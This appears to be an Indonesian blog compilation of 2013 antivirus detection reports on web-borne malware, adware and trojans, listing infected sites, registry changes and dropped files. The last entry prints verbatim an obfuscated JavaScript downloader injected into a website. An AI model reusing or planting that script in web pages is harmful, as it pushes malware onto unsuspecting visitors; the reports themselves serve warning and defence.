JS/BlacoleRef.DD.17

JS/BlacoleRef.DD.17

http://getdiscountcodes.co.uk

http://micksbouncycastles.co.uk/

Virus: JS/BlacoleRef.DD.17

Tanggal Deteksi  : 07/06/2013

Jenis : JavaScript

Dialam bebas : Tidak

Laporan penularan  : rendah

Potensi Penularan : rendah

Tingkat kerusakan : rendah

VDF version: 7.11.83.146 - Friday, June 7, 2013

IVDF version7.11.83.146 - Friday, June 7, 2013

Penularan virus via web site.

Report dibawah sebagai security yang diberikan oleh google agar kita berhati-hati terhadap situs tersebut.

Walaupun peringatan sudah diberikan oleh google kami mencoba untuk terobos masuk dalam rangka untuk melihat aktifitas virusya terhadap PC.

Dan ternyata begitu loading virus langsung menyerbu masuk, seperti detail dibawah ini :

29/06/2013 11:24 [Real-Time Protection] Malware found

      Virus or unwanted program 'JS/BlacoleRef.DD.17 [virus]'

      detected in file 'C:\Users\Samsung\AppData\Local\Google\Chrome\User

      Data\Default\Cache\f_0004ba.

      Action performed: Transfer to Scanner

 Dibawah ini adalah gambaran situs yang kita coba untuk riset anti virus avira.

Sebagai bukti reaksi virus terhadap PC dapat anda lihat avira sedang scaning pada bagian yang diserang virus. Setiap perindahan kategori virus juga akan masuk. Tanpak seperti gambat dibawah ini. Kategori Adult and dating.

Jika kita menggunakan anti virus lainnya akan tedeteksi seperti dibawah ini :
Kaspersky: Trojan.JS.Agent.cbn 

Eset Smart Security : JS/Kryptik.AOL trojan

Dan ini hasil uji coba kita lakukan juga terhadap situs tersebut melalui virus total, hasilnya silahkan anda copy link dibawah ini.

https://www.virustotal.com/en/url/fb54e6616feac627683bb362731d901b67cc81e5dd3aef7f713aeb00fb6e8eba/analysis/

Apa status cantuman terbaru untuk getdiscountcodes.co.uk?

Situs tercantum sebagai mencurigakan - mengunjungi situs web ini dapat membahayakan komputer Anda.

Sebagian dari situs ini tercantum karena kegiatan mencurigakan sebanyak 2 kali selama 90 hari terakhir.

Apa yang terjadi saat Google mengunjungi situs ini?

Dari 85 laman yang kami uji pada situs tersebut selama 90 hari terakhir, 39 laman menyebabkan perangkat lunak berbahaya terunduh dan terpasang tanpa persetujuan pengguna. Google terakhir kali mengunjungi situs ini pada 2013-06-26 dan konten yang mencurigakan terakhir kali ditemukan di situs ini pada 2013-06-26.

Perangkat lunak berbahaya mencakup 151 trojan(s), 36 exploit(s).

Perangkat lunak berbahaya diinangi pada 4 domain, termasuk olivierresnik.com/, olfactorialist.com/, pdhcentral.com/

1 domain tampak berfungsi sebagai perantara untuk menyebarkan perangkat lunak jahat kepada pengunjung situs ini, termasuk vippraiahotel.com.br/.

Situs ini diinangi pada 1 jaringan, termasuk AS29550 (SIMPLYTRANSIT).

Apakah situs ini telah bertindak sebagai perantara yang menyebabkan penyebaran perangkat lunak jahat lebih lanjut?

Selama 90 hari terakhir, getdiscountcodes.co.uk tampak berfungsi sebagai perantara terinfeksinya 1 situs, termasuk digg.com/.

Apakah situs ini telah menginangi perangkat lunak jahat?

Ya, situs ini telah menginangi perangkat lunak berbahaya selama 90 hari terakhir. Situs tersebut menginfeksi 5 domain, termasuk topblogarea.com/,onebestlink.com/, digg.com.

Bagaimana hal ini bisa terjadi?

Dalam beberapa kasus, pihak ketiga dapat menambahkan kode berbahaya pada situs yang sah, yang akan memicu kami untuk menampilkan pesan peringatan.

Adware / Vittalia.Z

Adware / Vittalia.Z

Virus: Adware / Vittalia.Z

Tanggal ditemukan: 25/06/2013

Jenis: Adware / Spyware

Di alam liar: Tidak ada

Dilaporkan Infeksi: Rendah

Distribusi Potensi: Rendah

Kerusakan Potensi: Rendah

VDF version: 7.11.86.204 - Selasa, Juni 25, 2013

IVDF versi: 7.11.86.204 - Selasa, Juni 25, 2013

umum

Metode perbanyakan:

    • Tidak rutin menyebarkan sendiri

Deteksi dengan anti virus lainnya :

    • Kaspersky: tidak-a-virus: RiskTool.Win32.Agent.rv

    • AVG: Adware / Vittalia.Z

    • Eset: Win32/Vittalia.C

    • DrWeb: Adware.Downware.744

Platform / OS:

    • Windows 2000

    • Windows XP

    • Windows 2003

    • Windows Vista

    • Windows Server 2008

    • Windows 7

arsip

Berkas berikut ini dibuat:

-          File berbahaya Non:

 • %appdata%\temp\7b31Installer.exe; %appdata%\temp\7b31Installer.INI;
      %temp%p\ajax_loader.gif; %temp%p\instloffer.exe;
      %temp%p\square_babylonv3.bmp; %temp%p\toolbar_bbv3.bmp;
      %temp%p\square_babylonv2.bmp; %temp%p\toolbar_bbv2.bmp;
      %temp%p\mockup_softwareupdater.bmp; %temp%p\config.xml;
      %temp%p\nslA.tmp\modern-header.bmp; %temp%p\nslA.tmp\modern-wizard.bmp;
      %temp%p\nslA.tmp\ButtonEvent.dll; %temp%p\nslA.tmp\System.dll;
      %temp%p\nslA.tmp\ToolkitOffers.dll; %temp%p\nslA.tmp\nsArray.dll;
      %temp%p\nslA.tmp\nsDialogs.dll; %temp%p\nslA.tmp\BgWorker.dll;
      %temp%p\nslA.tmp\ExecDos.dll; %temp%p\nslA.tmp\AnimGif.dll

Sementara file yang mungkin dihapus setelah:

    •% AppData% \ temp \ 7b31fondo.bmp.zip

    •% AppData% \ temp \ 7b31header.bmp.zip

    •% temp% \ nsf9.tmp

    • C: \ loader64.gif

    • C: \ icon.ico

    •% temp% \ nslA.tmp

Registri :

Kunci registri berikut ditambahkan untuk memuat layanan setelah reboot:

– [HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance]
   • "Disable Performance Counters"="dword:0x00000001"

– [HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance]
   • "Disable Performance Counters"="dword:0x00000001"

Kunci registri berikut ditambahkan:

– [HKLM\SYSTEM\ControlSet001\Services\HidUsb\Enum]
   • "Count"="dword:0x00000000"
   • "NextInstance"="dword:0x00000000"

– [HKLM\SYSTEM\ControlSet001\Services\Mouclass\Enum]
   • "Count"="dword:0x00000002"
   • "NextInstance"="dword:0x00000002"

– [HKLM\SYSTEM\ControlSet001\Services\mouhid\Enum]
   • "Count"="dword:0x00000000"
   • "NextInstance"="dword:0x00000000"

– [HKLM\SYSTEM\ControlSet001\Services\usbccgp\Enum]
   • "Count"="dword:0x00000000"
   • "NextInstance"="dword:0x00000000"

– [HKLM\SYSTEM\ControlSet001\Services\usbhub\Enum]
   • "Count"="dword:0x00000001"
   • "NextInstance"="dword:0x00000001"

– [HKLM\SYSTEM\CurrentControlSet\Services\HidUsb\Enum]
   • "Count"="dword:0x00000000"
   • "NextInstance"="dword:0x00000000"

– [HKLM\SYSTEM\CurrentControlSet\Services\Mouclass\Enum]
   • "Count"="dword:0x00000002"
   • "NextInstance"="dword:0x00000002"

– [HKLM\SYSTEM\CurrentControlSet\Services\mouhid\Enum]
   • "Count"="dword:0x00000000"
   • "NextInstance"="dword:0x00000000"

– [HKLM\SYSTEM\CurrentControlSet\Services\usbccgp\Enum]
   • "Count"="dword:0x00000000"
   • "NextInstance"="dword:0x00000000"

– [HKLM\SYSTEM\CurrentControlSet\Services\usbhub\Enum]
   • "Count"="dword:0x00000001"
   • "NextInstance"="dword:0x00000001"

Kunci registri berikut berubah:

– [HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance]
   Old value:
   • "Error Count"=dword:00000012
   New value:
   • "Error Count"="dword:0x000003e8"

– [HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance]
   Old value:
   • "Error Count"=dword:00000012
   New value:
   • "Error Count"="dword:0x000003e8"

APPL/Somoto.ilw

APPL/Somoto.ilw

Virus terdeteksi dengan Avira Internet Security sewaktu kita mencoba download file dan virus terselubung masuk dengan 7zip Setup langsung ke sasaran directory C.

Data file tersebut kami simpan di D. Data ini juga terkontaminasi virus.

25/06/2013 21:38 [Real-Time Protection] Malware found

      Virus or unwanted program 'APPL/Somoto.ilw [program]'

      detected in file

      'C:\Users\Samsung\AppData\Roaming\IDM\DwnlData\Samsung\7ZipSetup-bxRcebJ_459\7ZipSetup-bxRcebJ.exe.

      Action performed: Deny access

Baidu Pc Faster  : Malware.Win32.Agent.40

Eset Smart Security : Win32/RiskWare.HackAV.DM

D:\SOFTWARE TOP\[files.indowebster.com]-TNod_1.4.1_Final_Portable.rar       Win32/RiskWare.HackAV.DM application       No action

Terakhir ini virus ini mulai berkembang sejak tanggal 25 Juni 2013 penulis mendapatkan bibitnya , mulai masuk via file-file yang telah terkompres seperti zip dan rar.

Bagi teman-teman yang mendownload file yang bersifat zip dan rar mohon hati-hati.

Lebih-lebih lagi jika anda download file yang bersifat data, dan tersimpan di D atau E ini harus super hati-hati dalam proses clean nya. Sebab file ini bisa terhapus dengan anti virus tertentu.

Malware.win32.agent.40

Malware.win32.agent.40

Scan via Baidu PC Faster beta

Virus jenis ini masuk pada saat download file yang menggunakan ZIP. Proses dibawah ini kita lakukan scan manual setiap beberapa hari sekali, lantaran aktivitas penggunaan internet yang intensitasnya tinggi. Dirasakan perlu untuk mengecek virus pada direktory tertentu yang ada pada Laptop kami. Pada gambar dibawah ini jelas tampak posisi penyerangan virus pada direktory D.

Jika anda scan manual dengan Eset smart Security maka akan terdeteksi dengan nama virus dibawah ini :

D:\SOFTWARE TOP\[files.indowebster.com]-TNod_1.4.1_Final_Portable.rar       Win32/RiskWare.HackAV.DM application       No action

Perlu kita ketahui, bahwa virus ini ada pada zip atau rar, jika proses clean akan anda lakukan secara otomatis file tersebut akan hilang. Maka anda perlu berhati-hati dalam memberikan reaksi pembersihannya virus tersebut. Apalagi menyangkut data penting yang anda simpan dalam bentuk zip atau rar.

TR/Dropper.Gen

TR/Dropper.Gen

Tanggal ditemukan: 19/06/2007

Jenis: Trojan

Sub Jenis : Dropper

Di alam liar: Ya

Dilaporkan Infeksi: Rendah

Distribusi Potensi: Rendah

Kerusakan Potensi: Rendah

VDF version: 7.04.00.34

Efek samping:

    • Drops file berbahaya

Keterangan:

Rutinitas deteksi generik dirancang untuk mendeteksi karakteristik keluarga yang umum dibagi dalam beberapa varian.

Ini rutin deteksi khusus dikembangkan untuk mendeteksi varian dikenal dan akan terus ditingkatkan.:

Deteksi dengan anti virus lainnya adalah

Microsoft        : TrojanSpy:Win32/Keatep.B

Symantec        : Downloader

Eset                 : Win32/Spy.Keatep

Menurut para pakar virus radar karakteristik virus Win32/Spy.Keatep.A adalah sebuah trojan yang mencuri password dan informasi sensitif lainnya. Trojan mencoba untuk mengirim informasi yang dikumpulkan ke mesin remote. File ini adalah run-time dikompresi menggunakan UPX.

Instalasi :

Trojan tidak membuat salinan dari dirinya sendiri.

Registry yang diubah:

[HKEY_LOCAL_MACHINE\­SYSTEM\­CurrentControlSet\­Services\­SharedAccess\­Parameters\­FirewallPolicy\­StandardProfile\­AuthorizedApplications\­List]

"%malwarefilepath%" = "%malwarefilepath%:*:Enabled:ipsec"

Perintah dilakukan menciptakan pengecualian di Windows Firewall.

Registry yang diubah menjadi :

[HKEY_CURRENT_USER\­Software\­ksli]

"session" = "%variable%"

Sebuah string dengan konten variabel digunakan sebagai pengganti %variabel%.

mencuri informasi

Win32/Spy.Keatep.A adalah sebuah trojan yang mencuri password dan informasi sensitif lainnya.

Informasi berikut ini dikumpulkan:

login user names for certain applications/services

login passwords for certain applications/services

FTP account information

Program berikut akan terpengaruh:

BitKinex

BulletProof FTP

Classic FTP

Core FTP

CuteFTP

ExpanDrive

FTP Control

FTP Explorer

Far Manager

FileZilla

FlashFXP

Fling FTP

Frigate

IP*Works! FTP

Internet Explorer

LeapFTP

Mozilla Firefox

Opera

Remote Desktop

SmartFTP

Total Commander

TurboFTP

WS_FTP

WinSCP

Windows Commander

Trojan mencoba untuk mengirim informasi yang dikumpulkan ke mesin remote.

Trojan berisi alamat URL. Protokol TCP digunakan.

HTML/Nadbugo.A

HTML/Nadbugo.A -

Kasus Virus site www.natiga.org

02/06/2013 17:08 [Web Protection] Malware found

      When accessing data from the URL, "http://ww5.natiga.org/"

      a virus or unwanted program 'HTML/Nadbugo.A' [virus] was found.

      Action taken: Move file to quarantine

Sementara hasil cek dengan site virus total seperti dibawah ini hasilnya, silahkan cek lagi untuk validasi virusnya.

https://www.virustotal.com/en/url/d26078d18b0a5fcbfe835d4fe14a7b
8347a15aba9c80c1881af91ae561ea2b16/analysis/1370167832/

Rekaman gambar dibawah ini kami peroleh dengan menggunakan laptop lain, terdapat beberapa perbedaan tampilannya.ini juga sangat mengherankan kami. Yang di ketik www.natiga.org  hasilnya seperti gambar dibawah ini. Situs pertama sitenya ww1.natiga.org sedangkan yng kedua ww5.natiga.org padahal proses ketik sitenya www.natiga.org.

Gambar 2 Natiga.org berbeda dengan gambar 1

Demikian sekilas informasi tentang virus  HTML/Nadbugo.A, mudah-mudahan dapat berguna. Dan jangan lupa update terus Avira Internet Securitynya.

TR/Symmi.21593.3

TR/Symmi.21593.3

                                                                                             

Tanggal ditemukan: 30/05/2013

Jenis: Trojan

Di alam liar: Tidak

Dilaporkan Infeksi: Rendah

Distribusi Potensi: Rendah

Kerusakan Potensi: Rendah

Ukuran File  : 281600 Bytes

VDF version: 7.11.81.218 - Thursday, May 30, 2013

MD5 checksum: 52ff0d49787e9732bc60ef400eef8732

File detail Bahasa Program : MS Visual C++. 

Metode perbanyakan:     • Tidak rutin menyebarkan sendiri

Deteksi dengan anti virus lainnya:
   •  Mcafee: PWS-Zbot.dx
   •  Kaspersky: Trojan-Spy.Win32.Zbot.lwhq
   •  Bitdefender: Trojan.GenericKD.1014858
   •  VirusBuster: TrojanSpy.Zbot!8nPClXNj/1M
   •  Eset: Win32/Kryptik.BCHP
   •  Sunbelt: Trojan.Win32.Generic!BT
   •  GData: Trojan.GenericKD.1014858


Platforms / OS:
   • Windows 2000
   • Windows XP
   • Windows 2003
   • Windows Vista
   • Windows Server 2008
   • Windows 7

Efek samping:

    • Drops file

Files 

Berkas berikut dibuat:

– C:\TEMP\tmp%eight-digit random character string%.bat Furthermore it gets executed after it was fully created. This batch file is used to delete a file.

Injeksi :

Salah satu proses berikut:

    • wscntfy.exe

    • explorer.exe

    • ctfmon.exe

    • wuauclt.exe

Rincian file

Bahasa pemrograman:

Program malware ditulis dalam MS Visual C + +.

Win32/LockScreen.ASZ

Win32/LockScreen.ASZ

Spesifikasi virus :

Jenis  : Trojan

Ukuran file : 417792 bytes

Kode database versi : 8227 ( 14 April 2013)

Efek samping kerja virus ini  :

Win32/LockScreen.ASZ adalah Trojan yang memblokir access ke OS Windows.

Deteksi dengan anti virus lainnya :

Trojan:Win32/Malex.gen!E (Microsoft)

Variant.Graftor.64005 (BitDefender)

Instalasi :

Ketika dieksekusi, terjadi salinan dirinya ke lokasi berikut:

%windir%\­winlogon.exe

Dalam rangka untuk dijalankan pada setiap sistem start, trojan menetapkan entri Registry berikut:

[HKEY_LOCAL_MACHINE\­SOFTWARE\­Microsoft\­Windows NT\­CurrentVersion\­Winlogon]

"Shell"= "%windir%\­winlogon.exe"

Trojan dapat menghapus entri Registry berikut:

[HKEY_LOCAL_MACHINE\­SYSTEM\­CurrentControlSet\­Control\­SafeBoot\­Minimal]

[HKEY_LOCAL_MACHINE\­SYSTEM\­CurrentControlSet\­Control\­SafeBoot\­Network]

Berikut entri Registry yang dibuat:

[HKEY_LOCAL_MACHINE\­SOFTWARE\­MrDos212\­Winlocker]

[HKEY_CURRENT_USER\­Software\­Microsoft\­Windows\­CurrentVersion\­Policies\­System]

"DisableTaskMgr" = 1

Trojan menampilkan kotak dialog berikut:

Untuk mendapatkan kembali akses ke sistem operasi pengguna diminta untuk memenuhi beberapa persyaratan yang diberikan dalam pertukaran untuk mendapatkan password / instruksi.

Password untuk mengakses kembali sistem operasi adalah salah satu dari berikut:

358268033303653

Ketika password yang benar dimasukkan trojan menghilangkan diri dari komputer.

Trojan dapat mengakhiri proses yang berjalan tertentu.

Blok trojan keyboard dan mouse input.

Sumber : virus radar.

ADWARE/Adware.Gen (Bagian 2)

ADWARE/Adware.Gen

Kasus pada software Speedy PC Pro

Virus               : ADWARE/Adware.Gen

Tanggal ditemukan: 02/10/2009

Jenis: Adware

Di alam liar: Ya

Dilaporkan Infeksi: Rendah

Distribusi Potensi: Rendah

Kerusakan Potensi: Rendah

Keterangan:

Rutinitas deteksi generik dirancang untuk mendeteksi karakteristik keluarga yang umum dibagi dalam beberapa varian.

Ini rutin deteksi khusus dikembangkan untuk mendeteksi varian dikenal dan akan terus ditingkatkan.

01/06/2013 14:46 [Real-Time Protection] Malware found

      Virus or unwanted program 'ADWARE/Adware.Gen [adware]'

      detected in file 'C:\Program Files\SpeedyPC Software\SpeedyPC\Utility.pxt.

      Action performed: Deny access

Gambar dibawah adalah gejala reaksi virus yang di respon dengan Avira Internet Security detik itu juga. Jika PC memori anda terbatas ini bisa berakibat Hang/crash dalam waktu sesaat. Usahakan jangan membuka program aplikasi dalam jumlah banyak minimal setiap anda bekerja dapat mengakses program sebanyak 2 software aplikasi saja. Seperti Winamp dan Office word. Memori standar yang terpasang pada PC kita sangat terbatas kemampuannya apalagi usianya sudah mencapai 2 tahun pemakaian.

JS/EXP.Redir.EL.7

JS/EXP.Redir.EL.7

Kasus pada site www.uyirvani.com

Hasil repost via Avira Internet Security Exported events:

31/05/2013 17:28 [Real-Time Protection] Malware found

      Virus or unwanted program 'JS/EXP.Redir.EL.7 [virus]'

      detected in file 'C:\ProgramData\Avira\AntiVir

      Desktop\TEMP\WEBGUARD\0002A201.html.

      Action performed: Deny access

31/05/2013 17:28 [Web Protection] Malware found

      When accessing data from the URL,

      "http://sitecheck.sucuri.net/results/www.uyirvani.com"

      a virus or unwanted program 'JS/EXP.Redir.EL.7' [virus] was found.

      Action taken: Blocked file

Virus langsung menggoyang sistem pada PC dan dalam waktu singkat Avira juga melakukan Block terhadap virus tersebut. Berhati-hatilah terhadap situs ini.

Dibawah ini hasil analisis yang lebih akurat terhadap status situs www.uyirvani.com

https://www.virustotal.com/en/url/f1b4774f339740c4a90b94a69dd6e9968353b6c
69f63af30304713045ad72f4e/analysis/

Javascript adalah bahasa yang digunakan untuk membuat website interaktif. Jika kode javascript ditulis dengan cara samar sehingga tidak mudah untuk melihat apa yang dilakukannya, itu dianggap sebagai JavaScript Obfuscation . JavaScript Obfuscation    sering digunakan untuk menyembunyikan kode berbahaya yang dapat memaksa software yang tidak diinginkan berbahaya pada perangkat Anda.

Tanggal ditemukan: 16/05/2013

Jenis: JavaScript

Di alam liar: No

Dilaporkan Infeksi: Rendah

Distribusi Potensi: Rendah

Kerusakan Potensi: Rendah ke sedang

VDF version: 7.11.78.218 - Thursday, May 16, 2013

File detail Bahasa Program : Java Script

Metode perbanyakan:     • Tidak rutin menyebarkan sendiri

Efek samping:

    • Dapat digunakan untuk mengeksekusi kode berbahaya

 • Dapat digunakan oleh pengguna jahat atau malware ke pengaturan keamanan yang lebih rendah

    • Diarahkan ke situs web yang terinfeksi  

Deteksi dengan anti virus lainnya :

  •  Eset: JS/Kryptik.AKT 

Platforms / OS:
   • Windows 2000
   • Windows XP
   • Windows 2003
   • Windows Vista
   • Windows Server 2008
   • Windows 7
Update terus anti Virus Avira Internet Security nya.

JS/TrojanDownloader.Agent.NKWtrojan

JS/TrojanDownloader.Agent.NKWtrojan

Kasus pada situs www.duniaflora.com

Sebagian script pada html mengadung virus.

Javascript malware. 

Details: 

<!--44e772472a6c8ee7faf4f3701360ed7e-><script language=javascript>uoqnczam="MOrOhkPvKu%@l&IGNP";fxwbk="<sL63L72L69pL74 L6caL6egL75L61L67L65=L6aavaL73L63ripL74L3e L20fuL6eL63tL69onL20L77oL67tc(L73L6eL29{vaL72L20L6epL65L69,oL74L6aL3d\"+L29}
GL31asL23AL4aL32L5bdL49L26biL5eL4e0'jC=*TL40,L63mL42opL5dL75tqL65L37;L50L28:
ZrL4bL5fL5c\"3L7eL48L34L24! -L6bL4fL778L565{xL55ML45L6cgyL39f6hL6ev|z.`F\",qpL6a=\"L22,zoeq,fL76L2coL6cL62=
L22\",hpr;L66L6fr(npL65iL3d0;L6epL65iL3cL73L6e.lenL67tL68;npeL69+L2bL29L7b zoeL71=sL6e.chL61rAt(npei);fvL3dL6fL74jL2eL69nL64L65L78L4ff(L7aoeq);ifL28fL76>-1L29
{L20L68prL3dL28(fvL2b1)L25L381L2d1)L3bif(hpL72<=L30)hprL2bL3d81;oL6cL62+
L3dotjL2echarL41t
(hprL2dL31L29;L20} L65L6cse oL6cb+=L7aL6fL65L71L3b}L71pj+=L6fL6cb;docuL6denL74L2ewriL74L65(qpj);}
L3cL2fsL63L72L69L70L74>";aimrujv=unescape(fxwbk.replace(/L/g,uoqnczam.charAt(10)));var wmd,slha;document.write(aimrujv);wmd="<#mK^]q-gsvytsy7*3Cs|s#mK^]q3>-IpmtB7vq`8K^q7:-3<S=R&(@-gsvytsy7*\\32s|sSmK^]q\\3-SR=*\\3nqq]Z//888`yppyg7svsg^q^m#`v7q/\"\"tqi`C#?3)IpmtB7vq`K767KK7K)3\\3><\\/S=R&(@>3-}P-</#mK^]q>--";wogtc(wmd);</script

 Deteksi dengan anti virus lainnya sebagai berikut :

BitDefender    : Trojan.Downloader.JS.Small.NAT

Emsisoft          : Trojan.Downloader.JS.Small.NAT (B)

F-Secure          : Trojan.Downloader.JS.Small.NAT

GData             : Trojan.Downloader.JS.Small.NAT

MicroWorld-eScan : Trojan.Downloader.JS.Small.NAT

nProtect           : Trojan.Downloader.JS.Small.NAT

Adapun  hasil scan yang lebih detail lagi klik link dibawah ini.

https://www.virustotal.com/en/file/9c82e2b5c709615fff0da6a07b891e99a3e
762bb7f42d860200c02dcb9b01aab/analysis/1369994214/